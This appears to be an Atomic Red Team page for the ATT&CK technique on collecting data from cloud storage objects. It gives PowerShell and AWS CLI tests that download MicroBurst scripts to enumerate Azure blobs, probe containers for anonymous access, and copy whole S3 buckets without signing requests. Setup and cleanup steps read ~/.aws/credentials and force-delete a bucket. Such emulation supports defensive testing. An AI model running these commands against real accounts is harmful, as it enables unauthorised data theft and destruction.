Try it using Invoke-Atomic

Data from Cloud Storage Object

Description from ATT&CK

Adversaries may access data from improperly secured cloud storage.

Many cloud service providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs.

In other cases, SaaS application providers such as Slack, Confluence, and Salesforce also provide cloud storage solutions as a peripheral use case of their platform. These cloud objects can be extracted directly from their associated application.(Citation: EA Hacked via Slack - June 2021)(Citation: SecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Citation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(Citation: Dark Clouds_Usenix_Mulazzani_08_2011)

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

Atomic Tests

Atomic Test #1 - Azure - Enumerate Azure Blobs with MicroBurst

Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account. See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ .

Supported Platforms: iaas:azure

auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590

Inputs:

Name Description Type Default Value
base Azure blob keyword to enumerate (Example, storage account name) String secure
output_file File to output results to String $env:temp\T1530Test1.txt
wordlist File path to keywords for search permutations String $env:temp\permutations.txt

Attack Commands: Run with powershell!

1
2
3
import-module "$env:temp\Invoke-EnumerateAzureBlobs.ps1"
Invoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile "#{output_file}"

Cleanup Commands:

1
2
remove-item #{output_file} -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: The Invoke-EnumerateAzureBlobs module must exist in $env:temp.

Check Prereq Commands:

1
2
if (test-path $env:temp\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1}

Get Prereq Commands:

1
2
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "$env:temp\Invoke-EnumerateAzureBlobs.ps1"

Description: The wordlist file for search permutations must exist in $env:temp.

Check Prereq Commands:

1
2
if (test-path #{wordlist}){exit 0} else {exit 1}

Get Prereq Commands:

1
2
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"

Atomic Test #2 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)

Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file. The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information. See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service

Supported Platforms: iaas:azure

auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0

Inputs:

Name Description Type Default Value
base_name Azure storage account name to test String T1530Test2
output_file File to output results to String $env:temp\T1530Test2.txt
container_name Container name to search for (optional) String None
blob_name Blob name to search for (optional) String None

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
8
9
10
try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
catch [system.net.webexception]
{if($_.Exception.Response -ne $null)
{$Response = $_.Exception.Response.GetResponseStream()
$ReadResponse = New-Object System.IO.StreamReader($Response)
$ReadResponse.BaseStream.Position = 0
$responseBody = $ReadResponse.ReadToEnd()}
else {$responseBody = "The storage account could not be anonymously accessed."}}
"Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append

Cleanup Commands:

1
2
remove-item #{output_file} -erroraction silentlycontinue

Atomic Test #3 - AWS - Scan for Anonymous Access to S3

Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder.

Supported Platforms: iaas:aws

auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5

Inputs:

Name Description Type Default Value
s3_bucket_name Name of the bucket String redatomic-test2

Attack Commands: Run with sh!

1
2
aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name}

Cleanup Commands:

1
2
3
aws s3 rb s3://#{s3_bucket_name} --force 
rm -rf /tmp/#{s3_bucket_name}

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2
3
4
5
6
cat ~/.aws/credentials | grep "default"
aws s3api create-bucket --bucket #{s3_bucket_name}
aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json
touch /tmp/T1530.txt
aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name}

Get Prereq Commands:

1
2
echo Please install the aws-cli and configure your AWS default profile using: aws configure

source